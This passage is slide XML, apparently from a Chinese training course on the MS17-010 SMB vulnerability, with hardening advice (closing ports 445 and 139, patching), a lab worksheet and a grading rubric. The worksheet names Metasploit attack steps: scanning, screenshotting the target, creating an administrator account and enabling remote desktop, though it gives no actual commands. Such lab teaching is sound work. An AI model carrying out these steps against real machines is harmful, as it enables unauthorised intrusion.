              <a:t>漏洞要考虑从内网和外网两个网络环境进行防御加固，内网要做好系统补丁管理工作，防止系统运行恶意软件，及时做好补丁更新，外网要做好防火墙的设置规则，关闭端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>135</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>137</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>138</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>139</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，及时下载安装更新补丁。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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51856" y="1513378"/>
            <a:ext cx="9973310" cy="830811"/>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zh-CN" dirty="0"/>
              <a:t>根据项目实施的步骤，完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞利用与安全加固；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>填写以下项目训练节点的名称或参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>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【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="932160" y="2111663"/>
          <a:ext cx="6154689" cy="4357605"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1581021"/>
                <a:gridCol w="2286834"/>
                <a:gridCol w="2286834"/>
              </a:tblGrid>
              <a:tr h="222331">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>项目名称</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63523" marR="63523" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>项目节点</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63523" marR="63523" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>节点参数</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63523" marR="63523" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="275267">
                <a:tc rowSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>设置实验环境</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、配置攻击机</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>地址</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、配置靶机</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>地址</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、扫描测试端口</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、测试网络互联互通</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rowSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>漏洞利用</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、设置扫描模块</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、设置攻击模块</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、设置靶机、监听机</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>IP</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a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、对远程主机当前屏幕进行截图</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en-US" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、创建用户并加入管理员组</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rowSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>漏洞利用</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63523" marR="63523" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>在</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>msf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>开启远程桌面</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zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>连接远程桌面</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zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>登陆远程桌面</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zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>查看用户属性</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rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>漏洞加固</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63523" marR="63523" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>关闭</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>139</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>445</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>端口</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r h="275267">
                <a:tc vMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1000" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>安装更新补丁</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63523" marR="63523" marT="0" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1000" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="63523" marR="63523" marT="0" marB="0" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>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922" y="1578165"/>
          <a:ext cx="5202555" cy="5020945"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="1699895"/>
                <a:gridCol w="448945"/>
                <a:gridCol w="991870"/>
                <a:gridCol w="991870"/>
              </a:tblGrid>
              <a:tr h="386715">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>项目名称</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" dirty="0" smtClean="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>MS17_010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>漏洞利用与安全加固</a:t>
                      </a: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671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缓冲区溢出、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>SMB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1050" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>协议、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>445</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1050" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>端口</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10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dirty="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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漏洞利用与加固测试</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20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组员沟通、合作、完成情况</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10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态度端正，无无故缺勤、迟到、早退</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10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按计划完成工作任务</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30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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>与小组成员能合作，协调工作</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="105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10</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71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just">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实训过程认真细致</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a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>5</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87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l">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" sz="1050" kern="100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>有独立见解，提出独特解决问题方法</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1050" kern="10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lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" kern="100" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="1050" kern="100" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Calibri" panose="020F0502020204030204"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720">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2240280"/>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549275">
                <a:tc gridSpan="12">
                  <a:txBody>
                    <a:bodyPr/>
